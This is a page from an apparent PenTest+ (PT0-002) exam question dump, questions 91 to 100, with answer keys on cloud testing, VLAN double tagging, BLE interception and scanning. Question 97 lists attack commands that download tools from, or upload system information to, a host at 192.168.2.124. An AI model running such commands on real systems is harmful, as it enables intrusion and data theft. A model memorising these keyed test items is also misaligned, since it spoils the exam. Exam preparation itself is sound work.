CompTIA CompTIA Certifications PT0-002 Questions & Answers

• Question 91:

  Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

  A. Whether the cloud service provider allows the penetration tester to test the environment

  B. Whether the specific cloud services are being used by the application

  C. The geographical location where the cloud services are running

  D. Whether the country where the cloud service is based has any impeding laws

  Correct Answer: A

  The first thing that a penetration tester should consider when engaging in a penetration test in a cloud environment is whether the cloud service provider allows the tester to test the environment, as this will determine whether the tester has permission or authorization to perform the test. Some cloud service providers have policies or terms of service that prohibit or restrict penetration testing on their platforms or require prior approval or notification before testing. The tester should review these policies and obtain written consent from the provider before conducting any testing activities.

• Question 92:

  A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

  A. RFID cloning

  B. RFID tagging

  C. Meta tagging

  D. Tag nesting

  Correct Answer: D

  since vlan hopping requires 2 vlans to be nested in a single packet. Double tagging occurs when an attacker adds and modifies tags on an Ethernet frame to allow the sending of packets through any VLAN. This attack takes advantage of how

  many switches process tags. Most switches will only remove the outer tag and forward the frame to all native VLAN ports. With that said, this exploit is only successful if the attacker belongs to the native VLAN of the trunk link. https://

  cybersecurity.att.com/blogs/security-essentials/vlan-hopping- and-mitigation

  Tag nesting is a technique that involves inserting two VLAN tags into an Ethernet frame to bypass VLAN hopping prevention mechanisms. The first tag is stripped by the first switch, and the second tag is processed by the second switch,

  allowing the frame to reach a different VLAN than intended. RFID cloning is a technique that involves copying the data from an RFID tag to another tag or device. RFID tagging is a technique that involves attaching an RFID tag to an object or

  person for identification or tracking purposes. Meta tagging is a technique that involves adding metadata to web pages or files for search engine optimization or classification purposes.

• Question 93:

  A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?

  A. Determine if the tester was proficient.

  B. Test a new non-public-facing server for vulnerabilities.

  C. Determine if the initial report is complete.

  D. Test the efficacy of the remediation effort.

  Correct Answer: D

  A retest is a follow-up assessment where the penetration tester checks if the vulnerabilities found in the initial test have been fixed or mitigated by the client. A retest can provide many benefits, such as verifying the effectiveness of the remediation actions, showing improvement to internal or external stakeholders, and reducing the risk of future exploitation. A retest is usually performed after a certain period of time, which can be agreed upon in the rules of engagement or the statement of work. A week after the scheduled maintenance window is a reasonable time frame to allow the client to apply the necessary patches or configuration changes to their network. Therefore, the client is most likely attempting to test the efficacy of the remediation effort by asking for a retest.

• Question 94:

  A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?

  A. The timing of the scan

  B. The bandwidth limitations

  C. The inventory of assets and versions

  D. The type of scan

  Correct Answer: C

• Question 95:

  A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

  A. Wireshark

  B. Gattacker

  C. tcpdump

  D. Netcat

  Correct Answer: B

  The best tool for performing an on-path attack on BLE smart devices is Gattacker. Gattacker is a Bluetooth Low Energy (BLE) pentesting and fuzzing framework specifically designed for on-path attacks. It allows security analysts to perform a variety of tasks, including man-in-the-middle attacks, passive and active scans, fuzzing of BLE services, and more. Gattacker also provides an interactive command-line interface that makes it easy to interact with the target BLE device and execute various commands.

• Question 96:

  A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

  A. Tailgating

  B. Dumpster diving

  C. Shoulder surfing

  D. Badge cloning

  Correct Answer: D

• Question 97:

  A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

  B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)

  C. schtasks /query /fo LIST /v | find /I "Next Run Time:"

  D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

  Correct Answer: A

  https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to- download-malware-while-bypassing-av/ --- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

  The certutil command is a Windows utility that can be used to manipulate certificates and certificate authorities. However, it can also be abused by attackers to download files from remote servers using the -urlcache option. In this case, the command downloads accesschk64.exe from http://192.168.2.124/windows-binaries/ and saves it locally. Accesschk64.exe is a tool that can be used to check service permissions and identify potential privilege escalation vectors. The other commands are not relevant for this purpose. Powershell is a scripting language that can be used to perform various tasks, but in this case it uploads a file instead of downloading one. Schtasks is a command that can be used to create or query scheduled tasks, but it does not help with service permissions. Wget is a Linux command that can be used to download files from the web, but it does not work on Windows by default.

• Question 98:

  A penetration tester developed the following script to be used during an engagement:

  #!/usr/bin/python

  import socket, sys

  ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

  if len(sys.argv) > 1:

  target = socket.gethostbyname (sys. argv [0])

  else:

  print ("Few arguments.")

  print ("Syntax: python {} ". format (sys. argv [0]))

  sys.exit ()

  try:

  for port in ports:

  s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

  settimeout (2)

  result = s.connect_ex ((target, port) )

  if result == 0:

  print ("Port {} is opened". format (port) )

  except KeyboardInterrupt:

  print ("\nExiting ... ")

  sys.exit ()

  However, when the penetration tester ran the script, the tester received the following message:

  socket.gaierror: [Errno -2] Name or service not known

  Which of the following changes should the penetration tester implement to fix the script?

  A. From: target = socket.gethostbyname (sys. argv [0]) To: target = socket.gethostbyname (sys.argv[1])

  B. From: s = socket. socket (socket. AF_INET, socket. SOCK_STREAM) To: s = socket.socket (socket.AF_INET, socket. SOCK_DGRAM)

  C. From: import socket, sys To: import socket import sys

  D. From: result = s.connect_ex ((target, port) ) To: result = s.connect ( (target, port) )

  Correct Answer: A

  The socket.gaierror: [Errno -2] Name or service not known is an error that occurs when the socket module cannot resolve the hostname or IP address given as an argument. In this case, the script is using sys.argv[0] as the argument for socket.gethostbyname, which is the name of the script itself, not the target IP address. The target IP address should be the first command-line argument after the script name, which is sys.argv1. Therefore, changing the script to use sys.argv1 as the argument for socket.gethostbyname will fix the error and allow the script to scan the ports of the target IP address.

• Question 99:

  Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

  A. The team exploits a critical server within the organization.

  B. The team exfiltrates PII or credit card data from the organization.

  C. The team loses access to the network remotely.

  D. The team discovers another actor on a system on the network.

  Correct Answer: D

• Question 100:

  A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?

  A. Using OpenVAS in default mode

  B. Using Nessus with credentials

  C. Using Nmap as the root user

  D. Using OWASP ZAP

  Correct Answer: B

  Using credentials during a vulnerability scan allows the scanner to gather more detailed information about the target system, including installed software, patch levels, and configuration settings. This helps to reduce the likelihood of false positives and increase the true positives of the results. Nessus is a popular vulnerability scanner that supports credential-based scanning and can be used to accomplish this goal. OpenVAS and Nmap are also popular scanning tools, but using default mode or running as the root user alone may not provide the necessary level of detail for accurate vulnerability identification. OWASP ZAP is a web application scanner and may not be applicable for non-web-based targets.